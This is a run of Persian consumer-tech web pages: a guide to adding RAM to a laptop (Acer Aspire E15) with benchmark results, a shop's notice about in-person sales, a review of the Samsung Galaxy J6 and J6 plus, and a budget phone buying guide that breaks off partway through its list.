همان طور که در تصویر بالا می‌بینید، با مراجعه به صفحه‌ی اشاره‌شده و انتخاب مدل لپ‌تاپ، متوجه می‌شویم که دو شکاف رم روی دستگاه وجود دارد که یکی از آن‌ها خالی‌ست. در بسیاری از لپ‌تاپ‌های ارزان‌قیمت موجود در بازار، چنین حالتی را شاهد هستیم که باعث انعطاف‌پذیری و قابلیت ارتقای خوب سیستم با صرف هزینه‌ی معقول می‌شود.

نکته‌ی دیگری که باید به آن توجه داشت، چگونگی دسترسی به شکاف‌های رم در سیستم است. در بعضی مدل‌ها، برای دسترسی، نیازمند باز کردن بسیاری از بخش‌های بدنه‌ی دستگاه هستیم؛ اما در موارد زیادی نیز تنها باز کردن یک یا دو پیچ و برداشتن یک پوشش از زیر لپ‌تاپ، برای دسترسی به رم‌های آن کفایت می‌کند.

در این راهنمای نوشتاری ارتقای رم، ما یکی از لپ‌تاپ‌های پرطرفدار موجود در بازار یعنی لپ تاپ ایسر Aspire E15 را مد نظر قرار داده‌ایم. این لپ‌تاپ، یکی از محصولات نسبتاً ارزان‌قیمت ایسر است که امکانات سخت‌افزاری تقریباً خوبی را نیز در اختیار کاربر قرار می‌دهد. علاوه بر این، در این محصول امکان دسترسی آسان به حافظه‌های رم و هارد لپ‌تاپ نیز وجود دارد.

چه میزان رم برای یک لپ‌تاپ مناسب است؟
بین قطعات مختلف یک لپ‌تاپ، می‌توان گفت حافظه‌ی رم بیشترین قابلیت ارتقا را داراست و اولین گزینه در صورت مواجه شدن با یک لپ‌تاپ کُند، افزایش حافظه‌ی رم آن است. لپ‌تاپی هم که ما به عنوان نمونه در نظر گرفته‌ایم، مانند بسیاری از مدل‌های هم‌قیمت خود در بازار، از 4 گیگابایت رم DDR4 SO-DIMM استفاده می‌کند و همان طور که گفتیم، یک شکاف اضافی برای ارتقا دارد.

این میزان رم (4 گیگابایت) را می‌توان حداقل حجم رم برای افرادی دانست که از سیستم‌عاملی نظیر ویندوز 10 استفاده می‌کنند. ویندوز 10 را می‌توان روی سیستمی با 2 گیگابایت یا حتی 1 گیگابایت رم نیز اجرا کرد؛ اما با این اعداد در هنگام استفاده از نرم‌افزارهای جانبی دچار مشکلاتی خواهید بود. وقتی صحبت از نرم‌افزارهای جانبی می‌کنیم، منظورمان چیز پیچیده و عجیبی نیست. حتی اگر از آن دسته افرادی باشید که با باز کردن سربرگ‌های متعدد در گوگل کروم به گشت و گذار در اینترنت می‌پردازند، دو گیگابایت رم برای شما واقعاً کم خواهد بود.

پیشنهاد کلی ما، حداقل 4 گیگابایت رم برای استفاده از ویندوز 10 است و اگر بتوانید آن را به 8 گیگابایت برسانید، در استفاده از نرم‌افزارهایی مثل فتوشاپ و بسیاری از بازی‌ها و اجرای برنامه‌های متعدد هم‌زمان نیز دچار مشکلی (حداقل از جهت رم) نخواهید شد.

یک موضوع دیگر که باید در نظر داشته باشید، بحث پهنای باند حافظه‌ی رم است. بسیاری از پردازنده‌‌‌های جدید توانایی پشتیبانی از حافظه چندکاناله را دارا هستند. هرچه تعداد کانال‌های حافظه بیشتر باشد، پهنای باند حافظه نیز بیشتر خواهد بود.

برای مثال، در لپ‌تاپ ایسر Aspire E 15 که از یک حافظه‌ی رم 4 گیگابایتی استفاده می‌کند، ارتباط با پردازنده‌ی Core i3-7100U در حالت تک‌کاناله است. اگر دومین شکاف را نیز پر کنید، ارتباط به حالت دو کاناله (Dual-Channel) سوییچ کرده و کارایی سیستم در عملیات سه‌بعدی مثل اجرای بازی‌ها، افزایش خواهد داشت. البته در بسیاری از برنامه‌ها مثل برنامه‌های آفیس، افزایش پهنای باند حافظه تأثیر خاصی ندارد.

چه نوع حافظه‌ی رمی باید تهیه کنید؟
پس از اینکه مطمئن شدید لپ‌تاپ شما شکاف خالی برای ارتقای رم دارد، باید در مورد نوع حافظه‌ای که می‌خواهید تهیه کنید، فکر کنید. اولین مورد، بحث انتخاب بین دو نوع متداولDDR3 و DDR4 است. در این مورد، مدل لپ‌تاپ و پشتیبانی آن از نوع حافظه‌ی مربوطه، تعیین‌کننده خواهد بود. اکثر مدل‌های یکی دو سال اخیر، از حافظه‌‌های DDR4 پشتیبانی می‌کنند.

بیشترین حافظه‌های رم لپ‌تاپ موجود در بازار در حال حاضر، رم‌های MHzDDR4-2133 و MHzDDR4-2400 هستند. شاید فکر کنید که در هر صورت، باید به دنبال سریع‌ترین رم موجود در بازار باشید و حتی بالاتر از انواعی که ذکر شد، به فکر تهیه‌ی MHzDDR4-2666 باشید؛ اما باید به این نکته توجه داشته باشید که ممکن است پردازنده‌ی شما سرعت‌هایی بالاتر از یک حد مشخص را پشتیبانی نکند. مثلا یک پردازنده‌ی Core i3 نسل هشتم، حداکثر از MHzDDR4-2400 پشتیبانی می‌کند و هر سرعتی بالاتر از آن را به 2400 مگاهرتز کاهش می‌دهد. پس حواستان باشد که هزینه‌ی اضافی صرف سرعتی که سیستم شما قادر به پشتیبانی از آن نیست، نکنید.

از سویی دیگر توجه داشته باشید مدل‌های رم با میزان تأخیر (Latency) مختلف نیز در بازار موجود هستند. قاعدتاً هر چقدر اعداد مربوط به تأخیر رم، کوچکتر باشد، کارایی و سرعت آن رم بالاتر خواهد بود. البته این افزایش کارایی در استفاده‌های روزمره و عادی چندان به چشم نمی‌آید. همچنین بعضی رم‌ها نیز از هیت‌سینک‌های آلومینیومی برای بهبود خنک‌سازی بهره می‌برند. درباره‌ی این موارد هم می‌توانیم بگوییم تهیه‌ی این محصولات که گران‌قیمت‌تر هم هستند، معمولاً تفاوت محسوسی در میزان کارایی ایجاد نمی‌کند.

به طور کلی پیشنهاد می‌کنیم بیش از مواردی مثل تأخیر، سعی کنید به دنبال برندی باشید که توسط یک شرکت معتبر وارد و ضمانت شده باشد تا در صورت بروز مشکل (که البته خیلی هم اتفاق نمی‌افتد) به دادتان برسد.

در مورد ظرفیت حافظه، پیشنهاد می‌شود که به همان میزان حافظه‌ای که روی لپ‌تاپ شما موجود است، یک ماژول جدید تهیه کنید. مثلاً اگر لپ‌تاپ شما یک ماژول 4 گیگابایتی دارد، تهیه‌ی یک رم 4 گیگابایتی دیگر می‌تواند مناسب و کافی باشد. البته افزودن یک رم 8 گیگابایتی نیز مشکلی ایجاد نخواهد کرد؛ اما پیشنهاد می‌گردد یک ماژول مشابه با رم فعلی خود تهیه کرده و به سیستم خود اضافه کنید تا حداکثر کارایی ممکن را دریافت کنید. ضمن اینکه در بسیاری از موارد استفاده روزمره، همین مجموع 8 گیگابایت کافی خواهد بود و مقدار بیشتر از آن تفاوت چندانی ایجاد نمی‌کند.

چگونه یک رم جدید به لپ‌تاپ اضافه کنیم؟
1. پیش از انجام هر کاری، از اینکه لپ‌تاپ شما به طور کامل خاموش شده است (در حالتSleep نباشد) اطمینان حاصل کرده و سپس کابل برق آن را قطع کنید.

2. مرحله‌ی بعد، دسترسی به محل قرار گرفتن حافظه‌های رم در لپ‌تاپ است. همان طور که پیش‌تر گفتیم، در بعضی مدل‌ها نیاز به باز کردن کل بدنه‌ی لپ‌تاپ داریم و بسیاری از مدل‌های دیگر، تنها نیاز به باز کردن یک دریچه‌ی مشخص دارند. نحوه‌ی دسترسی به این بخش را می‌توان در دفترچه‌ها یا فایل‌های PDF راهنمای لپ‌تاپ که روی وب‌سایت سازنده یا بعضی سایت‌های تخصصی تعمیر لپ‌تاپ یافت می‌شود، مطالعه کرد. در Aspire E15 و بسیاری از محصولات دیگر شرکت ایسر، تنها نیاز به باز کردن 3 عدد پیچ کوچک و باز کردن درِ کاور پشتی لپ‌تاپ داریم تا به رم دسترسی داشته باشیم.

3. در مرحله‌ی بعد، سعی کنید با لمس کردن یک قطعه‌ی فلزی در اطراف خود، از تخلیه‌ی بار الکتریکی که ممکن است در بدنتان ذخیره شده باشد، اطمینان حاصل کنید. در غیر این صورت احتمال آسیب رساندن به قطعات الکترونیکی لپ‌تاپ وجود دارد.

4. ماژول حافظه‌ای که تهیه کرده‌اید را روی شکاف مخصوص نصب کنید. روی ماژول‌های رم یک بریدگی کوچک در لبه‌ی پایینی وجود دارد که کاملاً وسط قرار نگرفته است. بنابراین همین بریدگی می‌تواند راهنمای شما در نحوه‌ی قرارگیری و نصب رم روی شکاف باشد؛ زیرا اگر ماژول را برعکس گرفته باشید، بریدگی روی رم و برآمدگی روی شکاف، در مقابل هم قرار نمی‌گیرند و نمی‌توان ماژول را نصب کرد.

پس از اینکه از جهت صحیح حافظه مطمئن شدید، آن را به آرامی به داخل شکاف هُل دهید تا پین‌های ماژول کاملاً داخل شکاف قرار گیرد. پس از آن، باید ماژول را به سمت پایین (به طرف بدنه‌ی لپ‌تاپ) فشار دهید تا دو گیره‌ی فلزی دو طرف، آن را نگه دارند. سپس به آرامی دو طرف رم را به سمت بیرون بکشید و اطمینان حاصل کنید که نصب به درستی انجام شده و حافظه در جای خود، لَق نباشد.

حافظه‌ی رم باید کاملاً مسطح در جای خود قرار گرفته باشد. اگر بخواهید ماژول را از جای خود خارج کنید، باید به طور هم‌زمان، دو گیره‌ی فلزی اطراف رم را به دو طرف در جهت بیرون رم بکشید تا رم آزاد شده و مقداری بالا بیاید. حالا میتواند آن را به آرامی از جای خود بیرون بکشید.

ماژول حافظه باید کاملاً مسطح در جای خود قرار گرفته و توسط بازوهای فلزی که در تصویر رنگی شده‌اند، قفل شود.

آیا رم بیشتر، لپ‌تاپ شما را سریع‌تر می‌کند؟
ما در آزمایش ارتقاء لپ‌تاپ خود، یک رم 8 گیگابایتی را به ماژول 4 گیگابایتی موجود روی دستگاه اضافه کرده و با این کار، حافظه‌ی موجود را سه‌برابر کرده و پهنای باند را نیز با تغییر از حالت تک‌کاناله به دوکاناله، افزایش داده‌ایم. نتایج بنچمارک PCMark نسخه‌ی 8 که کارهای اداری معمولی مانند مرور صفحات وب و ویرایش پرونده‌ها را مد نظر قرار می‌دهد در ادامه قابل مشاهده است:

بین حالت‌های تک‌کاناله و دوکاناله در کارهای محاسباتی سبک که زیاد از رم استفاده نمی‌کنند، تفاوت خاصی رخ نمی‌دهد.

کارهای ساده مثل مواردی که ذکر شد، چندان از حافظه استفاده نمی‌کنند و 4 گیگابایت برای آن‌ها کافی است. ارتقا به 8 گیگابایت در کارهای سنگین‌تر و اجرای هم‌زمان برنامه‌ها کمک خواهد کرد. ضمن اینکه برای بسیاری از کاربران عادی لپ‌تاپ، استفاده از بیش از 8 گیگابایت رم، تقریباً هیچ آورده‌ای نخواهد داشت. به همین دلیل است که باید بگوییم بهتر است افراد، انتظارات خود را از افزایش کارایی با افزایش رم، تا حد معقولی کاهش دهند.

نرم‌افزار SiSoft Sandra می‌تواند میزان افزایش تئوری پهنای باند حافظه‌ی ما را در صورت افزودن یک ماژول 8 گیگابایتی و حالت دیگری با استفاده از دو ماژول 8 گیگابایتی نشان دهد. اما باید ببینیم این افزایش تئوری، چه تأثیر عملی و محسوسی خواهد داشت.

تغییر از حالت تک‌کاناله به دوکاناله، پهنای باند حافظه را به میزان قابل توجهی افزایش می‌دهد.

پهنای باند به کمک گیمینگ می‌آید
در صورت استفاده از گرافیک‌های مجتمع، افزایش پهنای باند با استفاده از رم دو کاناله، بهبود کارایی سیستم را بیشتر نمایش می‌دهد. با استفاده از 3DMark Cloud Gate شرکتFuturemark، بخش مربوط به کارایی گرافیک را بررسی کردیم و چیزی حدود 28 درصد افزایش کارایی در سوییچ از حالت تک‌کاناله به دوکاناله را شاهد بودیم.

برای بررسی تفاوت بین استفاده از دو ماژول هم‌ظرفیت (دو حافظه‌ی 8 گیگابایتی) و دو ماژول با ظرفیت‌های متفاوت (یک حافظه‌ی 4 گیگابایتی و یک 8 گیگابایتی)، این دو حالت را نیز با یکدیگر مقایسه کردیم. نتیجه، اختلاف اندکی را نشان می‌دهد، که می‌توان آن را نادیده گرفت.

یک نتیجه‌ی کلی از این بررسی می‌تواند این باشد که اگر در بازی کردن دچار مشکلات قابل توجهی هستید، افزودن ماژول رم و تغییر از حالت تک‌کاناله به دوکاناله، می‌تواند تفاوت نسبتاً قابل توجهی ایجاد کند.

در تغییر تک‌کاناله به دوکاناله روی لپ‌تاپ با پردازنده‌ Core i3-7100U و گرافیک مجتمع Intel HD620 حدود 28% افزایش کارایی گرافیکی مشاهده می‌شود

لینک منبع:https://www.shahrsakhtafzar.com/fa/articles-guides/memory/18722-how-to-add-ram-to-your-laptop

فروش حضوری محصولات مای نوکیا

فروش حضوری محصولات مای نوکیا

امکان خرید حضوری تمامی محصولات نوکیا از فروشگاه مای نوکیا فراهم است. اگر امکان خرید اینترنتی ندارید و یا به هر دلیلی تمایلی به خرید اینترنتی ندارید می توانید به صورت حضوری به دفتر مای نوکیا مراجعه کنید و محصولات مورد نظرتان را خریداری کنید.

نکات مهم:

۱) امکان فروش حضوری شنبه تا چهارشنبه از ساعت ۱۰:۳۰ صبح تا ۱۷:۳۰ عصر برقرار است. در ساعات دیگر و یا روزهای تعطیل با هماهنگی با آقای درویش زاده به شماره تماس ۰۹۳۹۴۰۱۹۴۱۵ امکان پذیر است.

۲) قبل از مراجعه به دفتر بهتر است طی یک تماس تلفنی هماهنگ کنید که اگر محصولات مورد نظر شما در دفتر مای نوکیا موجود است مراجعه کنید.

 

آدرس: جنت آباد شمالی، بالاتر از نیایش، بعد از چهار راه انصار المهدی، بالاتر از بهارستان ۲۳ (گل مکانی) پلاک ۳۳۸ واحد ۹

تلفن: ۴۴۸۱۱۰۹۲-۰۲۱

نقد و بررسی مشخصات سامسونگ galaxy J6 و galaxy J6 plus

سامسونگ این بار در اردیبهشت ۹۷  از گوشی جدیدی با نام galaxy J6  رونمایی کرده است و پس ازگذشت مدت کوتاهی گوشی میان رده ای با نام galaxy J6 plus  را نیز معرفی کرد که این گوشی ها در مدت زمان کوتاهی توانسته اند محبوبیت خود را در بین مردم افزایش دهند و بسیاری از افراد به خرید این گوشی ترغیب کرد شده اند .

با ما در سایت  جفت هیچ همراه باشید تا به بررسی این دو مدل گوشی سامسونگ بپردازیم .

galaxy J6

صفحه نمایش ۵٫۶ اینچی با رزولوشن ۷۲۰*۱۴۴۰ بسیار خود عمل می کند ، صفحه نمایشگر از نوع   Super AMOLED  است که رنگ  ها را بسیار واضح و زیبا به نمایش در می آورد . در این مدل گوشی از بدنه ی پلاستیکی استفاده شده است  و وزنی تنها برابر با ۱۵۴ گرم را داراست . اگر درصد روشنایی نمایشگر را به ۱۰۰ درصد برسانیم قابلیت خوانایی در نور خورشید می تواند شما را راضی نگه دارد .

galaxy J6

سیستم عامل galaxy J6  از اندروید ۸٫۰ اوریو پشتیبانی می کند و پردازنده ی آن ۸ هسته ای می باشد . رنگ بندی آن در ۳ رنگ مختلف مشکی ، طلایی و آبی در دسترس طرفداران می باشد . رم این گوشی ۳ گیگابایت  در کنار حافظه داخلی ۶۴ گیگابایتی  و  ظرفیت درگاه حافظه آن تا ۲۵۶ گیگابایت را پشتیبانی می کند .

دوربین اصلی این گوشی  ۱۳ مگاپیکسلی با دریچه  دیافراگم  f/1.9 و دوربین  سلفی ۸ مگاپیکسل به همراه فلش LED  با دیافراگم f/1.9 طراحی شده اند . فیلم برداری ۱۰۸۰P  با سرعت ۳۰ فریم در ثانیه و تشخیص چهره ، پانوراما از دیگر ویژگی های galaxy J6  می باشد.

باتری ۳۰۰۰ میلی آمپری galaxy J6  در یکبار شارژ ۳۶ ساعت دوام دارد اما متاسفانه از قابلیت شارژ سریع پشتیبانی نمی کند .

galaxy J6

 از دیگر ویژگی  های این گوشی باید به حسگر اثرانگشت و درگاه دو سیم کارته نانو آن اشاره کنیم . سیستم عامل این گوشی به شما این اجازه را می دهد که صفحه نمایش   galaxy J6 را به دو نیمه کاملاً مجزا تقسیم کنید و  از اجرای  جفت برنامه ها به طور همزمان لذت ببرید . بنابراین بطور مثال می توانید در هنگام  تماشای پیام های خود ، تماشای کلیپ های ویدئویی را نیز ادامه دهید . یکی دیگر از قابلیت های آن  فعال و غیرفعال کردن Wi-Fi بدون دردسر، Galaxy J6 سابقه Wi-Fi شما را ذخیره می کند و هنگام ورود و خروج از نقاط مورد استفاده به طور خودکار روشن و خاموش می شود تا بتوانید شارژ بیشتری را برای گوشی خود حفظ کنید این قابلیت چندی پیش در گوشی های پرچمدارش اضافه شده بود . این گوشی دارای نرم افزار سلامتی با نام Samsung Health می باشد که می توانید روزانه سلامتی خود را پیگیری کنید و عادات تغذیه ای و الگوی خواب تان را در نمودار ساده ای بررسی کنید .

همچنین پیشنهاد می کنم نقد و بررسی گوشی سامسونگ A9 2018 را بخوانید .

galaxy J6 plus

پس از شنیدن شایعات و مشخصات احتمالی که مدت ها  به گوش می رسید این گوشی اکنون در اختیار کاربران قرارگرفته است و به خوبی مخاطبانش را مجذوب خود کرده است . اگر به دنبال یک گوشی با قیمت مقرون به صرفه در عین حال حرفه ای و مجهز می گردید galaxy J6 plus یک انتخاب منطقی و عاقلانه برای شما می باشد . تا پایان این نقد و بررسی  لطفاً ما را همراهی کنید .

galaxy J6 plus

صفحه نمایش ۶٫۰ اینچی با رزولوشن ۷۲۰*۱۴۸۰ پیکسل و فلش LED از امکانات این گوشی می باشد . از فیلم برداری  ۱۰۸۰P  با سرعت ۳۰ فریم در ثانیه  نیز بهره من گشته است. رم ۳ – ۴ گیگابایت در کنار حافظه داخلی ۳۲- ۶۴ و پشتیبانی درگاه حافظه تا ظرفیت ۵۱۲ گیگابایت  و سیستم عامل  اندروید ۸٫۱ اوریو  از دیگر مشخصات فنی این گوشی می باشد .

دوربین

دوربین اصلی galaxy J6 plus  خوشبختانه  دوگانه می باشند البته چندان لنز های با کیفیتی را به همراه ندارد ولی شما می توانید حالت های مختلف عکس برداری را با این گوشی تجربه کنید ، دوربین ها شامل  لنز ۱۳ مگاپیکسلی با دیا فراگم f/1.9 در کنار لنز ۵ مگاپیکسلی با دریچه دیافراگم f/2.2   قرار گرفته اند و همچنین  دوربین سلفی ۸ مگاپیکسل با دیافراگم f/1.9  تعبیه شده است .

galaxy J6 plus

پردازنده ی چهار هسته‌ای ۱٫۴ گیگاهرتزی چندان قوی نمی باشد اما برای کارکرد معمولی روزانه قطعاً شما را راضی نگه می دارد .باتری کمی از مدل  galaxy J6  ، ظرفیت بیشتری را به همراه  دارد و ۳۳۰۰ میلی آمپری می باشد . رنگ بندی در ۴ رنگ مشکی ، خاکستری ، قرمز و آبی موجود می باشد . وزن galaxy J6 plus  به لطف بدنه ی شیشه ای آن  ۱۷۸ گرم می باشد و زرق و برق زیبایی را به همراه دارد . این گوشی دارای حسگر اثرانگشت در کنار گوشی می باشد.

نتیجه کلی

مشخصات 

galaxy J6 plus

galaxy J6  

  اندازه صفحه نمایش۶٫۰ اینچ۵٫۶ اینچ
  رزولوشن۱۴۸۰*۷۲۰۱۴۴۰*۷۲۰
  سیستم عامل۸٫۱ اوریو۸٫۰ اوریو
  وزن۱۷۸ گرم۱۵۴ گرم
  رم۴ گیگابایت۳ گیگابایت
  حافظه داخلی۶۴ گیگابایت ۳۲ – ۶۴ گیگابایت
  کارت حافظه۵۱۲ گیگابایت۲۵۶ گیگابایت
  دوربین اصلی۱۳ + ۵ مگاپیکسل۱۳ مگاپیکسل
  سلفی۸ مگاپیکسل ۸ مگاپیکسل
  ظرفیت باتری۳۳۰۰ میلی آمپر۳۰۰۰ میلی آمپر
  جنس بدنهشیشه ای پلاستیکی
  رنگ بندیمشکی ، خاکستری ، قرمز ، آبیمشکی ، طلایی ، آبی

نظر شما درباره ی این دو گوشی هوشمند چیست ؟ من دو گوشی A6 و A6 Plus  را بیشتر پسندیدم مشخصات و نقد بررسی این دو گوشی را نیز بخوانید .

بهترین گوشی های موبایل پیشنهادی بر اساس قیمت (ویژه نوروز 1398)

آیا برای خرید یک گوشی موبایل برنامه ریزی کرده‌اید؟ یا می‌خواهید از شر گوشی قدیمی خود خلاص شوید و آن را با یک مدل جدید‌تر و بروز‌تر که دارای امکانات کارآمدتری است عوض کنید؟ ازدیاد مدل‌های رنگارنگ در بازار هم گزینه‌های خرید شما را بیشتر می‌کند و هم دشواری شما را در انتخاب گوشی! این راهنمای خرید می‌تواند در انتخاب گوشی مناسب به شما کمک بسیاری کند.

بازار خرید گوشی های هوشمند و صنعت تولید و توسعه آن از جمله بزرگ‌ترین‌ها در نوع خود به شمار می‌رود. مردم جهان و به خصوص ما ایرانی‌ها علاقه خاصی به دارا بودن و ارتقای گوشی‌های شخصی خود داریم. در این میان با فراگیر شدن گوشی‌های هوشمند یا اسمارت فون‌ها بد نیست اگر قصد خرید یا ارتقای آن را دارید نگاهی به این مقاله داشته باشید تا همواره از جدید‌ترین و بهترین گزینه‌های خرید گوشی که از قیمت مناسبی نسبت به امکانات خود برخوردارند، آگاه شوید.

ما سعی خواهیم کرد این مقاله را به‌صورت مرتب مورد بازبینی قرار دهیم تا بتوانیم شایسته‌ترین گزینه‌های خرید گوشی را بر اساس شرایط بازار ایران به شما معرفی کنیم. بازار گوشی های موبایل در کشور ما برخلاف دیگر بازارهای حوزه الکترونیک و کامپیو‌تر کمتر وارد بحران می‌شود و همیشه مشتریان خود را حفظ می‌کند. خریداران زیادی هستند که بودجه زیادی را صرف خرید یک گوشی هوشمند می‌کنند؛ به‌طوری که بخشی از خرید خود بسیار راضی بوده و بخشی به دلیل انتخاب غلط و نابجا متضرر می‌گردند.

در این مقاله همانند دیگر مقاله‌های راهنمای خرید در شهر سخت افزار ما یک لیست شامل چندین گزینه که از ارزان‌ترین به گران‌ترین مرتب شده است به شما تقدیم خواهیم کرد تا بتوانید بر اساس بودجه خود اقدام به خرید گوشی نمایید. توجه داشته باشید مهم‌ترین فاکتوری که از دید ما در این مقاله به جهت انتخاب گزینه‌های معرفی‌شده، لحاظ شده است فاکتور قیمت به کارایی است.

این بدین معنی است که تمامی گوشی‌هایی که در این مقاله از دیدگان شما می‌گذرد، به نسبت قیمت خود بالا‌ترین کارایی را در همه جوانب ارائه می‌دهند. پس طبیعی است از ذکر مدل‌های خیلی لوکس و گوشی‌هایی که ارزش خرید چندان بالایی به نسبت امکانات عرضه شده ندارند، خودداری کرده‌ایم. همچنین در این لیست سعی کرده‌ایم علاوه بر نظر کارشناسان شهر سخت‌افزار، تمامی فیدبک‌ها و نظرات کاربرانی که از این گوشی‌ها استفاده کرده‌اند را لحاظ کنیم و از آوردن نام‌های نا‌آشنا و برندهای متفرقه خودداری کنیم.

پیش از آغاز معرفی بهترین گوشی ها، از شما دعوت می‌کنیم برای آگاهی از قیمت مدل‌های مختلف گوشی‌ها، به لیست قیمت گوشی موبایل شهر سخت افزار مراجعه نمایید.

بروزرسانی: در لیست گوشی های موبایل پیشنهادی شهر سخت افزار یک رتبه بندی بر اساس 6 فاکتور در قالب نمودار تنظیم شده است. این 6 فاکتور شامل مواردی همچون Quality، Features، Battery، Camera، Hardware و Display است. پارامترهایی که در امتیاز دهی به این موارد دخیل بوده اند فارغ از مواردی همچون قیمت، ظرفیت حافظه داخلی، خدمات پس از فروش و موارد این‌چنینی است. در زیر پارامترهایی که ما بر اساس آنها به این 6 فاکتور امتیاز داده ایم را مشاهده می کنید:

  • Hardware/سخت افزار: چیپست، هسته ها و سرعت پردازنده، پردازنده گرافیکی، میزان و نوع حافظه رم، نوع حافظه ذخیره سازی، اسلات کارت حافظه و مواردی از این قبیل.
  • Camera/دوربین: رزولوشن دوربین ها، گشودگی دیافراگم دوربین ها، فلش و نوع آن، قابلیت های فیلمبرداری و هرگونه مواردی که به دوربین گوشی مربوط باشد.
  • Battery/باتری: حجم باتری، قابلیت تعویض، زمان شارژ، شارژ دهی باتری، امکان شارژ سریع، شارژ بی سیم و هر مورد دیگری که مربوط به باتری باشد.
  • Display/نمایشگر: نوع پانل، رزولوشن، اندازه، تراکم تصویر، روشنایی و کنتراست، پوشش محافظ و هر مورد دیگری که مربوط به نمایشگر باشد.
  • Quality/کیفیت ساخت: جنس و متریال بدنه، فناوری ساخت و برش، ضدآب و خاک، ضد ضربه و تمامی فاکتورهایی که مربوط به کیفیت ساخت محصول مربوط باشد.
  • Features/قابلیت ها: قابلیت هایی جدا از 5 پارامتر دیگر در این دسته قرار می گیرند، مواردی همچون سنسور مادون قرمز، قلم، اسپیکرهای استریو و ... جزو این پارامتر محسوب می شوند.

ما 6 پارامتر ذکر شده را برای هر گوشی امتیازدهی کرده و در آخر نیز امتیاز نهایی را بر اساس میانگین آنها برای هر گوشی آورده ایم. امتیاز میانگین به خوبی جایگاه محصول را نشان می دهد و می تواند معیار خوبی برای سنجش آن در مقابل دیگر گزینه‌ها باشد.

نکته: قیمت‌های درج شده برای هر گوشی بر اساس قیمت روز بازار در تاریخ 14 اسفند 1397 ثبت شده است.


Nokia 2.1 8GB

یک میلیون و 200 هزار تومان بدون گارانتی

Nokia2.1.jpg

متاسفانه روزگار خوبی برای خرید دستگاه‌های الکترونیکی را تجربه نمی‌کنیم ولی باز هم در همین روزها می‌توان گوشی‌هایی را پیدا کرد که ارزش خرید بالایی داشته باشند. بعد از رستاخیز برند نوکیا این شرکت محصولات مقرون به صرفه زیادی را به خود دیده است که یکی از این محصول نوکیا 2.1 است. این گوشی علاوه بر امکانات خوب خود قیمت رقابتی دارد و شاید اگر بخواهیم مبلغی نه چندان زیاد را هزینه کنیم بهتر گزینه باشد. باتری بسیار قدرتمند، رابط کاربری سبک و سرعت مناسب در کنار ظاهر زیبا ویژگی‌هایی هستند که می‌توانند آن را به ارزانترین انتخاب با ارزش بازار این رزوهای کشور تبدیل کنند.

Nokia-2.1-1.png


Honor 7S 16GB

یک میلیون و 600 هزار تومان با گارانتی مدیا پردازش

هیچ چیز در این گرانی افسار گسیخته بهتر از یک گوشی هوشمند مدرن، ارزان و البته با کیفیت نیست! به عنوان اولین پیشنهاد نمی‌توان به سادگی از Honor 7s گذشت! در دورانی که دیگر نمی‌توان از برندهای کره‌ای گوشی‌های خوب زیر 2 میلیون تومان تهیه کرد، چه بهتر که به سراغ برندهای باکیفیت چینی برویم؟ آنر 7اس یک میان‌رده بسیار خوش قیمت با بدنه‌ای با کیفیت و نمایشگری مناسب است و از دو سیم‌کارت بهره‌مند است. نقطه قوت اصلی این گوشی در اندروید 8.1، چیپ‌ست 4 هسته‌ای، دوربین 13 مگاپیکسلی، پشتیبانی از شبکه 4G و باتری 3000 میلی آمپری آن است.


LG K10 2017 16GB

1 میلیون و 800 هزار تومان بدون گارانتی

LG-K10-2017.jpg

شاید این گوشی را کمی قدیمی فرض کنید ولی مشخصات سخت افزاری آن در کنار قیمتی که دارد می‌تواند برای بسیاری از کاربران هنوز گزینه‌ای بسیار مناسب باشد. LG K10 2017 از سخت‌افزاری قابل قبول به همراه نمایشگر با کیفیت و البته ظاهر مناسبی نیز برخوردار است که آن را به گزینه خوبی برای انجام امور روزانه تبدیل می‌کند. ال جی این گوشی را به اندروید 8.0 نیز بروز کرده و می‌تواند وضعیت نرم‌افزاری آن را بسیار بهبود بخشد. در بازار این روزها شاید بتوان کمتر گزینه‌هایی مانند این گوشی را پیدا کرد که هنوز ارزش خرید بالایی دارند.

LG-K10-2017.png


Xiaomi Redmi 5 32GB

دو میلیون و 200 هزار تومان بدون گارانتی

شیائومی برندیست که توانسته با قیمت‌های بسیار مناسب و امکانات بالا مشتریان زیادی برای خود پیدا کند. ردمی 5 میان‌رده بسیار خوش قیمتی از این برند چینی است که قصد داریم آن را به شما پیشنهاد دهیم. نکته قوت ردمی 5 در چیپ‌ست Snapdragon 450 با توان مصرفی پایین و عملکرد بسیار مناسب است، همچنین این گوشی با بدنه فلزی شارژدهی بسیار خوبی هم دارد و با دو اسلات سیم‌کارت و 32 گیگابایت حافظه داخلی و رم 3 گیگابایتی جزو انتخاب‌های غیر قابل تردید محسوب می‌شود.


Honor 9 Lite 32GB

دو میلیون و 400 هزار تومان با گارانتی مدیا پردازش

آنر 9 لایت پرفروش‌ترین مدل این‌روزهای اخیر از این برند چینی موفق است. آنر پس از جدایی از هواوی سخت تلاش می‌کند تا به جایگاه مناسبی در فروش و محبوبیت دست پیدا کند. مدل 9 لایت این برند جزو خوش قیمت‌ترین میان‌رده‌های بازار است و با تجهیز به 4 دوربین و سیستم تشخیص چهره دقیق و سریع گزینه ایده‌آلی به حساب می‌آید. از سوی دیگر طراحی خیره کننده و بدنه آیینه‌ای آن در کمتر مدل همرده‌ای به چشم می‌خورد.

Honor-9-lite.png


Xiaomi Redmi Note 5 AI 64GB

دو میلیون و 550 هزار تومان بدون گارانتی

Redmi Note 5 AI گزینه دیگریست که می‌توانید به آن فکر کنید. اگرچه یافتن گوشی‌های شیائومی به دلیل بحث رجیستری کمی سخت شده است، اما می‌توانید با کمی جست و جو در بازار این گوشی خوش قیمت را بیابید. نمایشگر با نسبت 18:9 و رزولوشن FullHD+ و دو دوربین با امکان ایجاد عمق میدان و کیفیت مناسب در کنار بدنه فلزی و بسیاری امکانات دیگر از ویژگی‌های مناسب این گوشی محسوب می‌شود. همچنین این گوشی جزو معدود گوشی‌ها با ظرفیت حافظه داخلی 64 گیگابایتی در این محدوده قیمتی است.

Redmi-Note-5-AI.jpg


Samsung Galaxy J7 Pro 64GB

2 میلیون و 950هزار تومان با گارانتی همراه سرویس خاورمیانه

